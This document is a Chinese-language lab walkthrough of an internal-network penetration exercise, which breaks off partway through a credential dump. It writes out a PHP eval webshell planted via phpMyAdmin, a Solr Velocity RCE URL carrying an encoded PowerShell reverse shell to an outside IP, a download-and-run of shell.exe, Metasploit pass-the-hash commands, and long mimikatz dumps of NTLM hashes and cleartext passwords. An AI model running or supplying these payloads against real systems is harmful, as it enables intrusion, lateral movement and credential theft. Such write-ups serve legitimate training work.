记一次教学版内网渗透流程

信息收集

如果觉得文章写的不错可以共同交流

http://aertyxqdp1.target.yijinglab.com/

dirsearch

dirsearch -u "http://aertyxqdp1.target.yijinglab.com/"

发现

http://aertyxqdp1.target.yijinglab.com/joomla/

http://aertyxqdp1.target.yijinglab.com/phpMyAdmin/

http://aertyxqdp1.target.yijinglab.com/joomla/.git

漏洞探测

Githack获取源码

python GitHack.py http://aertyxqdp1.target.yijinglab.com/joomla/.git

获取到源码

public $user = 'root';
public $password = 'yijing666mingyyiyeryi666';

public $log_path = 'C:\\phpStudy\\PHPTutorial\\WWW\\Joomla\\administrator/logs';
public $tmp_path = 'C:\\phpStudy\\PHPTutorial\\WWW\\Joomla/tmp';

漏洞利用

登录phpmyadmin,写webshell

show global variables like "secure%";


select '<?php eval($_POST["pwd"]); ?>' into outfile 'C:\\phpStudy\\PHPTutorial\\WWW\\Joomla\\shelld41d8cd98f00b204.php';

查看权限

写webshell

链接

信息收集

Windows IP 配置
以太网适配器 本地连接:
   连接特定的 DNS 后缀 . . . . . . . : openstacklocal
   本地链接 IPv6 地址. . . . . . . . : fe80::4d4:61aa:24be:fb73%11
   IPv4 地址 . . . . . . . . . . . . : 172.16.36.63
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 172.16.36.254
隧道适配器 isatap.openstacklocal:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : openstacklocal

whoami

net time /domain

不在域内

hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:329153f560eb329c0e1deea55e88a1e9:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

administrator
root

内网转发

fscan简单扫扫

上传代理

http://aertyxqdp1.target.yijinglab.com/Joomla/ttd41d8cd98f00b204.php
python neoreg.py -u http://aertyxqdp1.target.yijinglab.com/Joomla/ttd41d8cd98f00b204.php -k 123456789

solr站点

看core

内网渗透

命令执行

http://172.16.36.133:8983/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27powershell.exe%20-e%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAOAAyAC4AMQA1ADcALgAxADcAMwAuADEAMQAyACIALAA1ADAANQA2ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

在82.157.173.112服务器上

nc -lvnp 5056

反弹成功

同层2个机器

172.16.36.63
172.16.36.133 (双网卡)

在172.16.36.133信息收集发现172.16段

下msf马

swift 复制代码
$p = new-object system.net.webclient
$p.downloadfile("http://82.157.173.112:8081/shell.exe","shell.exe")

反弹

80机器(在域内)

net time /domain

传fscan

扫描172.16.16.0/24

f.exe -h 172.16.16.0/24 -o r16.txt

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
(icmp) Target 172.16.16.1     is alive
(icmp) Target 172.16.16.33    is alive
(icmp) Target 172.16.16.80    is alive
(icmp) Target 172.16.16.189   is alive
[*] Icmp alive hosts len is: 4
172.16.16.80:139 open
172.16.16.189:445 open
172.16.16.33:445 open
172.16.16.80:445 open
172.16.16.189:139 open
172.16.16.33:139 open
172.16.16.189:135 open
172.16.16.80:21 open
172.16.16.189:88 open
172.16.16.80:80 open
172.16.16.33:135 open
172.16.16.80:135 open
172.16.16.80:8983 open
[*] alive ports len is: 13
start vulscan
[*] NetInfo:
[*]172.16.16.189
   [->]WIN-MVNE1SFJ0LQ
   [->]172.16.16.189
[*] WebTitle: http://172.16.16.80       code:200 len:689    title:IIS7
[+] 172.16.16.80        MS17-010        (Windows 7 Professional 7601 Service Pack 1)
[+] 172.16.16.189       MS17-010        (Windows Server 2012 R2 Standard 9600)
[*] NetInfo:
[*]172.16.16.33
   [->]WIN-T02F2T5601J
   [->]172.16.16.33
[*] NetBios: 172.16.16.33    WIN-T02F2T5601J.dog.local           Windows Server 2016 Standard 14393 
[*] WebTitle: http://172.16.16.80:8983  code:302 len:0      title:None 跳转url: http://172.16.16.80:8983/solr/
[*] WebTitle: http://172.16.16.80:8983/solr/ code:200 len:14887  title:Solr Admin
[+] http://172.16.16.80:8983 poc-yaml-solr-velocity-template-rce 
已完成 13/13
[*] 扫描结束,耗时: 18.0771485s

综上

172.16.16.189 是域控

域名是dog.local

net view /domain:dog

域内还有有172.16.16.33这个机器

在80机器上加载kiwi

kiwi_cmd sekurlsa::logonpasswords

Authentication Id : 0 ; 1190960344 (00000000:46fc9cd8)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/12 0:09:46
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : DOG
         * NTLM     : e054e61488f2545292d4e5b9f722d9a2
        tspkg :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        wdigest :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : DOG.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 1186680366 (00000000:46bb4e2e)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/12 0:08:00
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : DOG
         * NTLM     : cf28dfb90f2faa3f856b4f2fa1d55fe9
        tspkg :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        wdigest :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 1177681477 (00000000:4631fe45)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/12 0:04:07
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : DOG
         * NTLM     : e054e61488f2545292d4e5b9f722d9a2
        tspkg :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        wdigest :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : DOG.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 1169604964 (00000000:45b6c164)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/12 0:00:36
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : DOG
         * NTLM     : e054e61488f2545292d4e5b9f722d9a2
        tspkg :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        wdigest :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : DOG.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 20558839 (00000000:0139b3f7)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 13:00:15
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : SOLR
         * NTLM     : 161cff084477fe596a5db81874498a24
        tspkg :
         * Username : Administrator
         * Domain   : SOLR
         * Password : (null)
        wdigest :
         * Username : Administrator
         * Domain   : SOLR
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : SOLR
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 20364385 (00000000:0136bc61)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 12:57:41
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : SOLR
         * NTLM     : 161cff084477fe596a5db81874498a24
        tspkg :
         * Username : Administrator
         * Domain   : SOLR
         * Password : (null)
        wdigest :
         * Username : Administrator
         * Domain   : SOLR
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : SOLR
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 12666668 (00000000:00c1472c)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 10:35:42
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : DOG
         * NTLM     : e054e61488f2545292d4e5b9f722d9a2
        tspkg :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        wdigest :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : DOG.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 12437392 (00000000:00bdc790)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 10:31:28
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : DOG
         * NTLM     : e054e61488f2545292d4e5b9f722d9a2
        tspkg :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        wdigest :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 10819842 (00000000:00a51902)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 10:14:05
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : DOG
         * NTLM     : e054e61488f2545292d4e5b9f722d9a2
        tspkg :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        wdigest :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : DOG.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 9333731 (00000000:008e6be3)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 9:50:00
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : administrator
         * Domain   : WIN-T02F2T5601J
         * LM       : f67ce55ac831223dc187b8085fe1d9df
         * NTLM     : 161cff084477fe596a5db81874498a24
         * SHA1     : d669f3bccf14bf77d64667ec65aae32d2d10039d
        tspkg :
         * Username : administrator
         * Domain   : WIN-T02F2T5601J
         * Password : 1qaz@WSX
        wdigest :
         * Username : administrator
         * Domain   : WIN-T02F2T5601J
         * Password : 1qaz@WSX
        kerberos :
         * Username : administrator
         * Domain   : WIN-T02F2T5601J
         * Password : 1qaz@WSX
        ssp :
        credman :

Authentication Id : 0 ; 7246833 (00000000:006e93f1)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 9:36:41
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : SOLR
         * LM       : f67ce55ac831223dc187b8085fe1d9df
         * NTLM     : 161cff084477fe596a5db81874498a24
         * SHA1     : d669f3bccf14bf77d64667ec65aae32d2d10039d
        tspkg :
         * Username : Administrator
         * Domain   : SOLR
         * Password : 1qaz@WSX
        wdigest :
         * Username : Administrator
         * Domain   : SOLR
         * Password : 1qaz@WSX
        kerberos :
         * Username : Administrator
         * Domain   : SOLR
         * Password : 1qaz@WSX
        ssp :
        credman :

Authentication Id : 0 ; 6122549 (00000000:005d6c35)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 9:20:48
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : administrator
         * Domain   : SOLR
         * LM       : f67ce55ac831223dc187b8085fe1d9df
         * NTLM     : 161cff084477fe596a5db81874498a24
         * SHA1     : d669f3bccf14bf77d64667ec65aae32d2d10039d
        tspkg :
         * Username : administrator
         * Domain   : SOLR
         * Password : 1qaz@WSX
        wdigest :
         * Username : administrator
         * Domain   : SOLR
         * Password : 1qaz@WSX
        kerberos :
         * Username : administrator
         * Domain   : SOLR
         * Password : 1qaz@WSX
        ssp :
        credman :

Authentication Id : 0 ; 342819 (00000000:00053b23)
Session           : Service from 0
User Name         : DefaultAppPool
Domain            : IIS APPPOOL
Logon Server      : (null)
Logon Time        : 2024/4/11 7:47:09
SID               : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
        msv :
         [00000003] Primary
         * Username : SOLR$
         * Domain   : DOG
         * NTLM     : fe1b9cb384f267f3bf2bb9192d927910
         * SHA1     : 09b44a82a5fe2e4859fdbc668e70b8ba63fd7e7f
        tspkg :
         * Username : SOLR$
         * Domain   : DOG
         * Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5
        wdigest :
         * Username : SOLR$
         * Domain   : DOG
         * Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5
        kerberos :
         * Username : SOLR$
         * Domain   : dog.local
         * Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5
        ssp :
        credman :

Authentication Id : 0 ; 136069 (00000000:00021385)
Session           : Interactive from 1
User Name         : Administrator
Domain            : SOLR
Logon Server      : SOLR
Logon Time        : 2024/4/11 7:45:17
SID               : S-1-5-21-2356296415-3603686952-1554484469-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : SOLR
         * LM       : f67ce55ac831223dc187b8085fe1d9df
         * NTLM     : 161cff084477fe596a5db81874498a24
         * SHA1     : d669f3bccf14bf77d64667ec65aae32d2d10039d
        tspkg :
         * Username : Administrator
         * Domain   : SOLR
         * Password : 1qaz@WSX
        wdigest :
         * Username : Administrator
         * Domain   : SOLR
         * Password : 1qaz@WSX
        kerberos :
         * Username : Administrator
         * Domain   : SOLR
         * Password : 1qaz@WSX
        ssp :
         [00000000]
         * Username : administrator
         * Domain   : (null)
         * Password : 1qaz@WSX
        credman :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 7:45:06
SID               : S-1-5-17
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 7:44:45
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : SOLR$
Domain            : DOG
Logon Server      : (null)
Logon Time        : 2024/4/11 7:44:45
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : SOLR$
         * Domain   : DOG
         * NTLM     : fe1b9cb384f267f3bf2bb9192d927910
         * SHA1     : 09b44a82a5fe2e4859fdbc668e70b8ba63fd7e7f
        tspkg :
        wdigest :
         * Username : SOLR$
         * Domain   : DOG
         * Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5
        kerberos :
         * Username : solr$
         * Domain   : DOG.LOCAL
         * Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5
        ssp :
        credman :

Authentication Id : 0 ; 33980 (00000000:000084bc)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2024/4/11 7:44:42
SID               : 
        msv :
         [00000003] Primary
         * Username : SOLR$
         * Domain   : DOG
         * NTLM     : fe1b9cb384f267f3bf2bb9192d927910
         * SHA1     : 09b44a82a5fe2e4859fdbc668e70b8ba63fd7e7f
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : SOLR$
Domain            : DOG
Logon Server      : (null)
Logon Time        : 2024/4/11 7:44:41
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : SOLR$
         * Domain   : DOG
         * Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5
        kerberos :
         * Username : solr$
         * Domain   : DOG.LOCAL
         * Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5
        ssp :
        credman :

其他获取的密码

攻击内网主机

哈希传递打33机器

use windows/smb/ms17_010_psexec

set smbuser administrator

set SMBDomain dog.local

set SMBPass aad3b435b51404eeaad3b435b51404ee:e054e61488f2545292d4e5b9f722d9a2

成功反弹

切换下路由哈希传递打189

use  exploit/windows/smb/psexec

set SMBUser administrator

set SMBPass aad3b435b51404eeaad3b435b51404ee:e054e61488f2545292d4e5b9f722d9a2

读取189密码

ipconfig

33的密码

Authentication Id : 0 ; 243527 (00000000:0003b747)
Session           : Interactive from 1
User Name         : Administrator
Domain            : WIN-T02F2T5601J
Logon Server      : WIN-T02F2T5601J
Logon Time        : 2024/4/11 9:01:45
SID               : S-1-5-21-1188958703-4046475421-80252671-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : WIN-T02F2T5601J
         * NTLM     : 161cff084477fe596a5db81874498a24
         * SHA1     : d669f3bccf14bf77d64667ec65aae32d2d10039d
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : WIN-T02F2T5601J
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : WIN-T02F2T5601J
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 40882 (00000000:00009fb2)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/4/11 8:57:53
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : WIN-T02F2T5601J$
         * Domain   : DOG
         * NTLM     : 1b45f9595e69e9c3b6c4638a9eb93742
         * SHA1     : 7441ee1a7c411a0270eed7e6795486d2a4c5939b
        tspkg :
        wdigest :
         * Username : WIN-T02F2T5601J$
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : WIN-T02F2T5601J$
         * Domain   : dog.local
         * Password : 6ivL>l5L4k%2OFgmyC*d9R.@v),mOXR^4:xGSteG#;P^n&48N""C4Y=>9C0K&P+%/x9B+0%#k=nXHl8ho(7Qq`:Ovt"iOBq1zy `7C$ wO`Nv-z=&'P"haR*
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-T02F2T5601J$
Domain            : DOG
Logon Server      : (null)
Logon Time        : 2024/4/11 8:57:51
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : WIN-T02F2T5601J$
         * Domain   : DOG
         * NTLM     : 1b45f9595e69e9c3b6c4638a9eb93742
         * SHA1     : 7441ee1a7c411a0270eed7e6795486d2a4c5939b
        tspkg :
        wdigest :
         * Username : WIN-T02F2T5601J$
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : win-t02f2t5601j$
         * Domain   : DOG.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 21095 (00000000:00005267)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2024/4/11 8:57:48
SID               : 
        msv :
         [00000003] Primary
         * Username : WIN-T02F2T5601J$
         * Domain   : DOG
         * NTLM     : 1b45f9595e69e9c3b6c4638a9eb93742
         * SHA1     : 7441ee1a7c411a0270eed7e6795486d2a4c5939b
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 2678848 (00000000:0028e040)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 13:07:39
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : DOG
         * NTLM     : e054e61488f2545292d4e5b9f722d9a2
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 2641030 (00000000:00284c86)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 13:01:37
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : WIN-T02F2T5601J
         * NTLM     : 161cff084477fe596a5db81874498a24
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : WIN-T02F2T5601J
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : WIN-T02F2T5601J
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 2617925 (00000000:0027f245)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 12:59:03
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : SOLR
         * NTLM     : 161cff084477fe596a5db81874498a24
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : SOLR
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : SOLR
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 1758011 (00000000:001ad33b)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 9:56:43
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : DOG
         * NTLM     : e054e61488f2545292d4e5b9f722d9a2
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 1550764 (00000000:0017a9ac)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 9:54:13
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : DOG
         * NTLM     : e054e61488f2545292d4e5b9f722d9a2
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : DOG.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 504399 (00000000:0007b24f)
Session           : Interactive from 2
User Name         : administrator
Domain            : DOG
Logon Server      : WIN-MVNE1SFJ0LQ
Logon Time        : 2024/4/11 9:11:41
SID               : S-1-5-21-2515766443-2959740750-3575737072-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : DOG
         * NTLM     : e054e61488f2545292d4e5b9f722d9a2
         * SHA1     : 6aec174b0d46521c233a254120538a6bddecc0c7
         * DPAPI    : cf28dfb90f2faa3f856b4f2fa1d55fe9
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : administrator
         * Domain   : DOG.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 488613 (00000000:000774a5)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/4/11 9:10:45
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : WIN-T02F2T5601J$
         * Domain   : DOG
         * NTLM     : 1b45f9595e69e9c3b6c4638a9eb93742
         * SHA1     : 7441ee1a7c411a0270eed7e6795486d2a4c5939b
        tspkg :
        wdigest :
         * Username : WIN-T02F2T5601J$
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : WIN-T02F2T5601J$
         * Domain   : dog.local
         * Password : 6ivL>l5L4k%2OFgmyC*d9R.@v),mOXR^4:xGSteG#;P^n&48N""C4Y=>9C0K&P+%/x9B+0%#k=nXHl8ho(7Qq`:Ovt"iOBq1zy `7C$ wO`Nv-z=&'P"haR*
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 8:57:54
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-T02F2T5601J$
Domain            : DOG
Logon Server      : (null)
Logon Time        : 2024/4/11 8:57:48
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : WIN-T02F2T5601J$
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : win-t02f2t5601j$
         * Domain   : DOG.LOCAL
         * Password : (null)
        ssp :
        credman :

189的密码

kiwi_cmd sekurlsa::logonpasswords

Authentication Id : 0 ; 40540132 (00000000:026a97e4)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/4/11 11:49:36
SID               : S-1-5-90-2
        msv :
         [00000003] Primary
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : DOG
         * NTLM     : 94901a951ee2d32e070982b4276eebd6
         * SHA1     : e5cb7373614ebcf623c1d23f74e8fe909ef3fbb3
        tspkg :
        wdigest :
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : dog.local
